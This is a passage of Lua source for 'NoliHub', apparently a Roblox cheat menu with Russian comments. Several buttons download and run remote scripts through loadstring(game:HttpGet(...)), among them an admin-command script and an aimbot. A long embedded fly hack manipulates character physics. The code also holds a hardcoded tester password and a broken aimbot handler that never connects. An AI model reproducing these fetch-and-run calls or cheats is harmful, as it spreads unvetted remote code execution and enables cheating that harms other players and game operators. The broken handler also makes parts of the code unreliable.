		script.Parent.Parent.Parent.Screens.Credits.Visible = false
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_24);
-- StarterGui.NoliHub.MainFrame.Tabs.Scripts.LocalScript
local function C_2c()
local script = G2L["2c"];
	local button = script.Parent
	
	local function leftClick()
		script.Parent.Parent.Parent.Screens.Home.Visible = false
		script.Parent.Parent.Parent.Screens.Scripts.Visible = true
		script.Parent.Parent.Parent.Screens.Credits.Visible = false
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_2c);
-- StarterGui.NoliHub.MainFrame.Tabs.Credits.LocalScript
local function C_32()
local script = G2L["32"];
	local button = script.Parent
	
	local function leftClick()
		script.Parent.Parent.Parent.Screens.Home.Visible = false
		script.Parent.Parent.Parent.Screens.Scripts.Visible = false
		script.Parent.Parent.Parent.Screens.Credits.Visible = true
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_32);
-- StarterGui.NoliHub.MainFrame.Drag
local function C_35()
local script = G2L["35"];
	local TweenService = game:GetService("TweenService")
	local UserInputService = game:GetService("UserInputService")
	
	-- Функция для плавного перемещения фрейма
	local function smoothMove(frame, targetPosition)
		local tweenInfo = TweenInfo.new(0.2, Enum.EasingStyle.Sine, Enum.EasingDirection.Out)
		local tween = TweenService:Create(frame, tweenInfo, {Position = targetPosition})
		tween:Play()
	end
	
	-- Функция для обработки начала перемещения
	local function makeDraggable(frame)
		local dragging = false
		local dragStart
		local startPos
	
		local function onInputBegan(input)
			if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
				dragging = true
				dragStart = input.Position
				startPos = frame.Position
	
				input.Changed:Connect(function()
					if input.UserInputState == Enum.UserInputState.End then
						dragging = false
					end
				end)
			end
		end
	
		local function onInputChanged(input)
			if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
				local delta = input.Position - dragStart
				local newPosition = UDim2.new(
					startPos.X.Scale,
					startPos.X.Offset + delta.X,
					startPos.Y.Scale,
					startPos.Y.Offset + delta.Y
				)
				smoothMove(frame, newPosition)
			end
		end
	
		frame.InputBegan:Connect(onInputBegan)
		frame.InputChanged:Connect(onInputChanged)
	end
	
	-- Пример использования
	local frame = script.Parent -- Укажите ваш фрейм
	makeDraggable(frame)
	
end;
task.spawn(C_35);
-- StarterGui.NoliHub.MainFrame.Screens.Home.Profile.Avatar.LocalScript
local function C_3c()
local script = G2L["3c"];
	local player = game.Players.LocalPlayer -- Получаем локального игрока
	local imageLabel = script.Parent -- Предполагается, что ImageLabel находится в родительском объекте скрипта
	
	-- Функция для установки аватара игрока в ImageLabel
	local function setPlayerAvatar()
		local userId = player.UserId -- Получаем ID игрока
		local avatarUrl = "https://www.roblox.com/headshot-thumbnail/image?userId="..userId.."&width=420&height=420&format=png"
		imageLabel.Image = avatarUrl -- Устанавливаем изображение в ImageLabel
	end
	
	-- Вызываем функцию для установки аватара
	setPlayerAvatar()
	
end;
task.spawn(C_3c);
-- StarterGui.NoliHub.MainFrame.Screens.Home.Profile.PlayerName.LocalScript
local function C_42()
local script = G2L["42"];
	local Players = game:GetService("Players")
	
	-- Функция для вставки имени игрока в TextLabel
	local function insertPlayerName(textLabel)
		-- Получаем игрока, которому принадлежит LocalScript
		local player = Players.LocalPlayer
	
		if player then
			-- Устанавливаем текст TextLabel с именем игрока
			textLabel.Text = "" .. player.Name
		else
			warn("Player not found!")
		end
	end
	
	-- Пример использования
	local textLabel = script.Parent -- Укажите имя вашего TextLabel
	insertPlayerName(textLabel)
	
end;
task.spawn(C_42);
-- StarterGui.NoliHub.MainFrame.Screens.Home.LocalScript
local function C_48()
local script = G2L["48"];
	wait(3)
	if script.Parent.Profile.PlayerName.Text == "nolimanom" then
		script.Parent.Profile.Owner.Visible = true
		script.Parent.Profile.User.Visible = false
		script.Parent.Profile.BackgroundColor3 = Color3.new(0.596078, 0.0901961, 0.0901961)
	end
end;
task.spawn(C_48);
-- StarterGui.NoliHub.MainFrame.Screens.Scripts.ScrollingFrame.Post.Panel.Execute.LocalScript
local function C_55()
local script = G2L["55"];
	local button = script.Parent
	
	local function leftClick()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_55);
-- StarterGui.NoliHub.MainFrame.Screens.Scripts.ScrollingFrame.Post.Panel.LocalScript
local function C_57()
local script = G2L["57"];
	if script.Parent.ExecuteLocked.Value == true then
		script.Parent.Execute.ImageColor3 = Color3.new(1, 0, 0)
		script.Parent.Execute.Interactable = false
	else
		script.Parent.Execute.ImageColor3 = Color3.new(1, 1, 1)
		script.Parent.Execute.Interactable = true
	end
end;
task.spawn(C_57);
-- StarterGui.NoliHub.MainFrame.Screens.Scripts.ScrollingFrame.Post.Panel.Execute.LocalScript
local function C_62()
local script = G2L["62"];
	local button = script.Parent
	
	local function leftClick()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_62);
-- StarterGui.NoliHub.MainFrame.Screens.Scripts.ScrollingFrame.Post.Panel.Execute.LocalScript
local function C_6d()
local script = G2L["6d"];
	local StarterGui = game.StarterGui
	local function showNotification(title, text)
		StarterGui:SetCore("SendNotification", {
			Title = title,
			Text = text,
			Duration = 5 -- Время отображения уведомления в секундах
		})
	end
	local button = script.Parent
	
	local function leftClick()
		showNotification("Premium-only", "У вас нет premium подписки")
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_6d);
-- StarterGui.NoliHub.MainFrame.Screens.Scripts.ScrollingFrame.Post.Panel.LocalScript
local function C_6f()
local script = G2L["6f"];
	if script.Parent.ExecuteLocked.Value == true then
		script.Parent.Execute.ImageColor3 = Color3.new(1, 0, 0)
		script.Parent.Execute.Interactable = false
	else
		script.Parent.Execute.ImageColor3 = Color3.new(1, 1, 1)
		script.Parent.Execute.Interactable = true
	end
end;
task.spawn(C_6f);
-- StarterGui.NoliHub.MainFrame.Screens.Scripts.ScrollingFrame.Post.Panel.Execute.LocalScript
local function C_89()
local script = G2L["89"];
	local button = script.Parent
	
	local function leftClick()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/ttwizz/Open-Aimbot/master/source.lua", true))()
	button.MouseButton1Click:Connect(leftClick)
	end
end;
task.spawn(C_89);
-- StarterGui.NoliHub.MainFrame.Screens.Scripts.ScrollingFrame.Post.Panel.Execute.LocalScript
local function C_96()
local script = G2L["96"];
	local button = script.Parent
	
	local function leftClick()
		local main = Instance.new("ScreenGui")
		local Frame = Instance.new("Frame")
		local up = Instance.new("TextButton")
		local down = Instance.new("TextButton")
		local onof = Instance.new("TextButton")
		local TextLabel = Instance.new("TextLabel")
		local plus = Instance.new("TextButton")
		local speed = Instance.new("TextLabel")
		local mine = Instance.new("TextButton")
		local closebutton = Instance.new("TextButton")
		local mini = Instance.new("TextButton")
		local mini2 = Instance.new("TextButton")
	
		main.Name = "main"
		main.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
		main.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
		main.ResetOnSpawn = false
	
		Frame.Parent = main
		Frame.BackgroundColor3 = Color3.fromRGB(163, 255, 137)
		Frame.BorderColor3 = Color3.fromRGB(103, 221, 213)
		Frame.Position = UDim2.new(0.100320168, 0, 0.379746825, 0)
		Frame.Size = UDim2.new(0, 190, 0, 57)
	
		up.Name = "up"
		up.Parent = Frame
		up.BackgroundColor3 = Color3.fromRGB(79, 255, 152)
		up.Size = UDim2.new(0, 44, 0, 28)
		up.Font = Enum.Font.SourceSans
		up.Text = "UP"
		up.TextColor3 = Color3.fromRGB(0, 0, 0)
		up.TextSize = 14.000
	
		down.Name = "down"
		down.Parent = Frame
		down.BackgroundColor3 = Color3.fromRGB(215, 255, 121)
		down.Position = UDim2.new(0, 0, 0.491228074, 0)
		down.Size = UDim2.new(0, 44, 0, 28)
		down.Font = Enum.Font.SourceSans
		down.Text = "DOWN"
		down.TextColor3 = Color3.fromRGB(0, 0, 0)
		down.TextSize = 14.000
	
		onof.Name = "onof"
		onof.Parent = Frame
		onof.BackgroundColor3 = Color3.fromRGB(255, 249, 74)
		onof.Position = UDim2.new(0.702823281, 0, 0.491228074, 0)
		onof.Size = UDim2.new(0, 56, 0, 28)
		onof.Font = Enum.Font.SourceSans
		onof.Text = "Переключить"
		onof.TextScaled = true
		onof.TextColor3 = Color3.fromRGB(0, 0, 0)
		onof.TextSize = 14.000
	
		TextLabel.Parent = Frame
		TextLabel.BackgroundColor3 = Color3.fromRGB(242, 60, 255)
		TextLabel.Position = UDim2.new(0.469327301, 0, 0, 0)
		TextLabel.Size = UDim2.new(0, 100, 0, 28)
		TextLabel.Font = Enum.Font.SourceSans
		TextLabel.Text = "FLY | NoliHub"
		TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
		TextLabel.TextScaled = true
		TextLabel.TextSize = 14.000
		TextLabel.TextWrapped = true
	
		plus.Name = "plus"
		plus.Parent = Frame
		plus.BackgroundColor3 = Color3.fromRGB(133, 145, 255)
		plus.Position = UDim2.new(0.231578946, 0, 0, 0)
		plus.Size = UDim2.new(0, 45, 0, 28)
		plus.Font = Enum.Font.SourceSans
		plus.Text = "+"
		plus.TextColor3 = Color3.fromRGB(0, 0, 0)
		plus.TextScaled = true
		plus.TextSize = 14.000
		plus.TextWrapped = true
	
		speed.Name = "speed"
		speed.Parent = Frame
		speed.BackgroundColor3 = Color3.fromRGB(255, 85, 0)
		speed.Position = UDim2.new(0.468421042, 0, 0.491228074, 0)
		speed.Size = UDim2.new(0, 44, 0, 28)
		speed.Font = Enum.Font.SourceSans
		speed.Text = "1"
		speed.TextColor3 = Color3.fromRGB(0, 0, 0)
		speed.TextScaled = true
		speed.TextSize = 14.000
		speed.TextWrapped = true
	
		mine.Name = "mine"
		mine.Parent = Frame
		mine.BackgroundColor3 = Color3.fromRGB(123, 255, 247)
		mine.Position = UDim2.new(0.231578946, 0, 0.491228074, 0)
		mine.Size = UDim2.new(0, 45, 0, 29)
		mine.Font = Enum.Font.SourceSans
		mine.Text = "-"
		mine.TextColor3 = Color3.fromRGB(0, 0, 0)
		mine.TextScaled = true
		mine.TextSize = 14.000
		mine.TextWrapped = true
	
		closebutton.Name = "Close"
		closebutton.Parent = main.Frame
		closebutton.BackgroundColor3 = Color3.fromRGB(225, 25, 0)
		closebutton.Font = "SourceSans"
		closebutton.Size = UDim2.new(0, 45, 0, 28)
		closebutton.Text = "X"
		closebutton.TextSize = 30
		closebutton.Position =  UDim2.new(0, 0, -1, 27)
	
		mini.Name = "minimize"
		mini.Parent = main.Frame
		mini.BackgroundColor3 = Color3.fromRGB(192, 150, 230)
		mini.Font = "SourceSans"
		mini.Size = UDim2.new(0, 45, 0, 28)
		mini.Text = "-"
		mini.TextSize = 40
		mini.Position = UDim2.new(0, 44, -1, 27)
	
		mini2.Name = "minimize2"
		mini2.Parent = main.Frame
		mini2.BackgroundColor3 = Color3.fromRGB(192, 150, 230)
		mini2.Font = "SourceSans"
		mini2.Size = UDim2.new(0, 45, 0, 28)
		mini2.Text = "+"
		mini2.TextSize = 40
		mini2.Position = UDim2.new(0, 44, -1, 57)
		mini2.Visible = false
	
		speeds = 1
	
		local speaker = game:GetService("Players").LocalPlayer
	
		local chr = game.Players.LocalPlayer.Character
		local hum = chr and chr:FindFirstChildWhichIsA("Humanoid")
	
		nowe = false
	
		game:GetService("StarterGui"):SetCore("SendNotification", { 
			Title = "Активирован STANDALONE";
			Text = "FLY";
			Icon = "rbxthumb://type=Asset&id=5107182114&w=150&h=150"})
		Duration = 5;
	
		Frame.Active = true -- main = gui
		Frame.Draggable = true
	
		onof.MouseButton1Down:connect(function()
	
			if nowe == true then
				nowe = false
	
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Climbing,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.FallingDown,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Flying,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Freefall,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.GettingUp,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Jumping,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Landed,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Physics,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.PlatformStanding,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Ragdoll,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Running,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.RunningNoPhysics,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Seated,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.StrafingNoPhysics,true)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Swimming,true)
				speaker.Character.Humanoid:ChangeState(Enum.HumanoidStateType.RunningNoPhysics)
			else 
				nowe = true
	
	
	
				for i = 1, speeds do
					spawn(function()
	
						local hb = game:GetService("RunService").Heartbeat	
	
	
						tpwalking = true
						local chr = game.Players.LocalPlayer.Character
						local hum = chr and chr:FindFirstChildWhichIsA("Humanoid")
						while tpwalking and hb:Wait() and chr and hum and hum.Parent do
							if hum.MoveDirection.Magnitude > 0 then
								chr:TranslateBy(hum.MoveDirection)
							end
						end
	
					end)
				end
				game.Players.LocalPlayer.Character.Animate.Disabled = true
				local Char = game.Players.LocalPlayer.Character
				local Hum = Char:FindFirstChildOfClass("Humanoid") or Char:FindFirstChildOfClass("AnimationController")
	
				for i,v in next, Hum:GetPlayingAnimationTracks() do
					v:AdjustSpeed(0)
				end
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Climbing,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.FallingDown,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Flying,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Freefall,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.GettingUp,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Jumping,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Landed,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Physics,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.PlatformStanding,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Ragdoll,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Running,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.RunningNoPhysics,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Seated,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.StrafingNoPhysics,false)
				speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Swimming,false)
				speaker.Character.Humanoid:ChangeState(Enum.HumanoidStateType.Swimming)
			end
	
	
	
	
			if game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then
	
	
	
				local plr = game.Players.LocalPlayer
				local torso = plr.Character.Torso
				local flying = true
				local deb = true
				local ctrl = {f = 0, b = 0, l = 0, r = 0}
				local lastctrl = {f = 0, b = 0, l = 0, r = 0}
				local maxspeed = 50
				local speed = 0
	
	
				local bg = Instance.new("BodyGyro", torso)
				bg.P = 9e4
				bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
				bg.cframe = torso.CFrame
				local bv = Instance.new("BodyVelocity", torso)
				bv.velocity = Vector3.new(0,0.1,0)
				bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
				if nowe == true then
					plr.Character.Humanoid.PlatformStand = true
				end
				while nowe == true or game:GetService("Players").LocalPlayer.Character.Humanoid.Health == 0 do
					game:GetService("RunService").RenderStepped:Wait()
	
					if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
						speed = speed+.5+(speed/maxspeed)
						if speed > maxspeed then
							speed = maxspeed
						end
					elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
						speed = speed-1
						if speed < 0 then
							speed = 0
						end
					end
					if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
						bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
						lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
					elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
						bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
					else
						bv.velocity = Vector3.new(0,0,0)
					end
					--	game.Players.LocalPlayer.Character.Animate.Disabled = true
					bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
				end
				ctrl = {f = 0, b = 0, l = 0, r = 0}
				lastctrl = {f = 0, b = 0, l = 0, r = 0}
				speed = 0
				bg:Destroy()
				bv:Destroy()
				plr.Character.Humanoid.PlatformStand = false
				game.Players.LocalPlayer.Character.Animate.Disabled = false
				tpwalking = false
	
	
	
	
			else
				local plr = game.Players.LocalPlayer
				local UpperTorso = plr.Character.UpperTorso
				local flying = true
				local deb = true
				local ctrl = {f = 0, b = 0, l = 0, r = 0}
				local lastctrl = {f = 0, b = 0, l = 0, r = 0}
				local maxspeed = 50
				local speed = 0
	
	
				local bg = Instance.new("BodyGyro", UpperTorso)
				bg.P = 9e4
				bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
				bg.cframe = UpperTorso.CFrame
				local bv = Instance.new("BodyVelocity", UpperTorso)
				bv.velocity = Vector3.new(0,0.1,0)
				bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
				if nowe == true then
					plr.Character.Humanoid.PlatformStand = true
				end
				while nowe == true or game:GetService("Players").LocalPlayer.Character.Humanoid.Health == 0 do
					wait()
	
					if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
						speed = speed+.5+(speed/maxspeed)
						if speed > maxspeed then
							speed = maxspeed
						end
					elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
						speed = speed-1
						if speed < 0 then
							speed = 0
						end
					end
					if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
						bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
						lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
					elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
						bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
					else
						bv.velocity = Vector3.new(0,0,0)
					end
	
					bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
				end
				ctrl = {f = 0, b = 0, l = 0, r = 0}
				lastctrl = {f = 0, b = 0, l = 0, r = 0}
				speed = 0
				bg:Destroy()
				bv:Destroy()
				plr.Character.Humanoid.PlatformStand = false
				game.Players.LocalPlayer.Character.Animate.Disabled = false
				tpwalking = false
	
	
	
			end
	
	
	
	
	
		end)
	
		local tis
	
		up.MouseButton1Down:connect(function()
			tis = up.MouseEnter:connect(function()
				while tis do
					wait()
					game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,1,0)
				end
			end)
		end)
	
		up.MouseLeave:connect(function()
			if tis then
				tis:Disconnect()
				tis = nil
			end
		end)
	
		local dis
	
		down.MouseButton1Down:connect(function()
			dis = down.MouseEnter:connect(function()
				while dis do
					wait()
					game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,-1,0)
				end
			end)
		end)
	
		down.MouseLeave:connect(function()
			if dis then
				dis:Disconnect()
				dis = nil
			end
		end)
	
	
		game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(char)
			wait(0.7)
			game.Players.LocalPlayer.Character.Humanoid.PlatformStand = false
			game.Players.LocalPlayer.Character.Animate.Disabled = false
	
		end)
	
	
		plus.MouseButton1Down:connect(function()
			speeds = speeds + 1
			speed.Text = speeds
			if nowe == true then
	
	
				tpwalking = false
				for i = 1, speeds do
					spawn(function()
	
						local hb = game:GetService("RunService").Heartbeat	
	
	
						tpwalking = true
						local chr = game.Players.LocalPlayer.Character
						local hum = chr and chr:FindFirstChildWhichIsA("Humanoid")
						while tpwalking and hb:Wait() and chr and hum and hum.Parent do
							if hum.MoveDirection.Magnitude > 0 then
								chr:TranslateBy(hum.MoveDirection)
							end
						end
	
					end)
				end
			end
		end)
		mine.MouseButton1Down:connect(function()
			if speeds == 1 then
				speed.Text = 'cannot be less than 1'
				wait(1)
				speed.Text = speeds
			else
				speeds = speeds - 1
				speed.Text = speeds
				if nowe == true then
					tpwalking = false
					for i = 1, speeds do
						spawn(function()
	
							local hb = game:GetService("RunService").Heartbeat	
	
	
							tpwalking = true
							local chr = game.Players.LocalPlayer.Character
							local hum = chr and chr:FindFirstChildWhichIsA("Humanoid")
							while tpwalking and hb:Wait() and chr and hum and hum.Parent do
								if hum.MoveDirection.Magnitude > 0 then
									chr:TranslateBy(hum.MoveDirection)
								end
							end
	
						end)
					end
				end
			end
		end)
	
		closebutton.MouseButton1Click:Connect(function()
			main:Destroy()
		end)
	
		mini.MouseButton1Click:Connect(function()
			up.Visible = false
			down.Visible = false
			onof.Visible = false
			plus.Visible = false
			speed.Visible = false
			mine.Visible = false
			mini.Visible = false
			mini2.Visible = true
			main.Frame.BackgroundTransparency = 1
			closebutton.Position =  UDim2.new(0, 0, -1, 57)
		end)
	
		mini2.MouseButton1Click:Connect(function()
			up.Visible = true
			down.Visible = true
			onof.Visible = true
			plus.Visible = true
			speed.Visible = true
			mine.Visible = true
			mini.Visible = true
			mini2.Visible = false
			main.Frame.BackgroundTransparency = 0 
			closebutton.Position =  UDim2.new(0, 0, -1, 27)
		end)
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_96);
-- StarterGui.NoliHub.MainFrame.Screens.Scripts.ScrollingFrame.Post.Panel.LocalScript
local function C_98()
local script = G2L["98"];
	if script.Parent.ExecuteLocked.Value == true then
		script.Parent.Execute.ImageColor3 = Color3.new(1, 0, 0)
		script.Parent.Execute.Interactable = false
	else
		script.Parent.Execute.ImageColor3 = Color3.new(1, 1, 1)
		script.Parent.Execute.Interactable = true
	end
end;
task.spawn(C_98);
-- StarterGui.NoliHub.MainFrame.Shadow.Restart.Restart.LocalScript
local function C_aa()
local script = G2L["aa"];
	local button = script.Parent
	
	local function leftClick()
	script.Parent.Text = "Производиться перезапуск..."
	wait(0.1)
	loadstring(game:HttpGet("https://raw.githubusercontent.com/nolimanom/Roblox-Scripts/refs/heads/main/NoliHub"))()
	wait(0.4)
	script.Parent.Parent.Parent.Parent.Parent:Destroy()
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_aa);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Selector.LocalScript
local function C_b1()
local script = G2L["b1"];
	local TweenService = game:GetService("TweenService")
	
	local guiElement = script.Parent -- Предположим, что этот скрипт находится в самом GUI элементе
	local isMovedUp = false -- Переменная для отслеживания состояния (вверх/вниз)
	
	-- Функция для плавного перемещения GUI элемента
	local function moveGuiElement(units, direction, time, onComplete)
		local targetPosition
	
		if direction == "up" then
			targetPosition = guiElement.Position + UDim2.new(0, 0, -units / 100, 0)
		elseif direction == "down" then
			targetPosition = guiElement.Position + UDim2.new(0, 0, units / 100, 0)
		else
			warn("Invalid direction specified. Use 'up' or 'down'.")
			return
		end
	
		local tweenInfo = TweenInfo.new(
			time, -- Время анимации
			Enum.EasingStyle.Back, -- Стиль плавности
			Enum.EasingDirection.InOut, -- Направление анимации
			0, -- Повторение (0 = без повторения)
			false -- Обратная анимация
		)
	
		local tween = TweenService:Create(guiElement, tweenInfo, {Position = targetPosition})
	
		tween.Completed:Connect(function()
			if onComplete then
				onComplete()
			end
		end)
	
		tween:Play()
	end
	
	-- Функция, которая будет привязана к кнопке
	local function onButtonClicked()
		if isMovedUp then
			moveGuiElement(35, "down", 1, function()
				script.Parent.Button.Rotation = 0
				script.Parent.Parent.YeaAnotherShadow.Visible = false
				isMovedUp = false
			end)
		else
			moveGuiElement(35, "up", 1, function()
				script.Parent.Parent.YeaAnotherShadow.Visible = true
				script.Parent.Button.Rotation = 180
				isMovedUp = true
			end)
		end
	end
	
	-- Привязываем функцию к событию нажатия кнопки
	local button = script.Parent.Button -- Предположим, что кнопка находится на том же уровне и называется Button
	button.MouseButton1Click:Connect(onButtonClicked)
	
end;
task.spawn(C_b1);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Selector.Home.LocalScript
local function C_b4()
local script = G2L["b4"];
	local button = script.Parent
	
	local function leftClick()
	script.Parent.Parent.Parent.Screens.Main.Visible = true
	script.Parent.Parent.Parent.Screens.Player_modification.Visible = false
	script.Parent.Parent.Parent.Screens.TesterMenu.Visible = false
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_b4);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Selector.Tester.PasswordSystem
local function C_b7()
local script = G2L["b7"];
	-- Предполагаем, что у вас есть ScreenGui с именем "ScreenGui", содержащий TextButton и TextBox
	
	-- Получаем элементы GUI
	local textBox = script.Parent.Parent.PasswordField  -- Найти TextBox
	local textButton = script.Parent.Parent.TesterLock  -- Найти TextButton
	
	-- Устанавливаем начальные значения
	textBox.Visible = false  -- TextBox скрыт по умолчанию
	
		-- Функция для обработки нажатия на кнопку
		textButton.MouseButton1Click:Connect(function()
			textBox.Visible = not textBox.Visible  -- Переключаем видимость TextBox
		end)
	
		-- Функция для проверки значения в TextBox
		textBox.FocusLost:Connect(function(enterPressed)
			if enterPressed and textBox.Text == "2945969" then  -- Если текст равен "2945969"
				print("Меню тестировщика активно")
				textBox.Text = "Меню активно"
				wait(5)
				textBox.Visible = false
				script.Parent.Interactable = true
				textButton.Visible = false
				script:Destroy()
			else
				print("Код не найден в датабазе")
				textBox.Text = "Код не найден в датабазе"
		
			end
		end)
end;
task.spawn(C_b7);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Selector.Tester.LocalScript
local function C_b8()
local script = G2L["b8"];
	local button = script.Parent
	
	local function leftClick()
	script.Parent.Parent.Parent.Screens.Main.Visible = false
	script.Parent.Parent.Parent.Screens.TesterMenu.Visible = true
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_b8);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Selector.Player_modification.LocalScript
local function C_bf()
local script = G2L["bf"];
	local button = script.Parent
	
	local function leftClick()
	script.Parent.Parent.Parent.Screens.Main.Visible = false
	script.Parent.Parent.Parent.Screens.TesterMenu.Visible = false
	script.Parent.Parent.Parent.Screens.Player_modification.Visible = true
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_bf);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Move
local function C_c0()
local script = G2L["c0"];
	local TweenService = game:GetService("TweenService")
	
	local guiElement = script.Parent -- GUI элемент, который нужно переместить
	local boolValue = script.Parent.MoveThis -- BoolValue элемент, который управляет анимацией
	
	-- Функция для плавного перемещения GUI элемента
	local function moveGuiElement(units, direction, time, onComplete)
		-- Задаем целевую позицию в зависимости от направления и количества единиц
		local targetPosition
		if direction == "up" then
			targetPosition = guiElement.Position + UDim2.new(0, 0, -units / 100, 0)
		elseif direction == "down" then
			targetPosition = guiElement.Position + UDim2.new(0, 0, units / 100, 0)
		elseif direction == "left" then
			targetPosition = guiElement.Position + UDim2.new(-units / 100, 0, 0, 0)
		elseif direction == "right" then
			targetPosition = guiElement.Position + UDim2.new(units / 100, 0, 0, 0)
		else
			warn("Invalid direction specified. Use 'up', 'down', 'left', or 'right'.")
			return
		end
	
		local tweenInfo = TweenInfo.new(
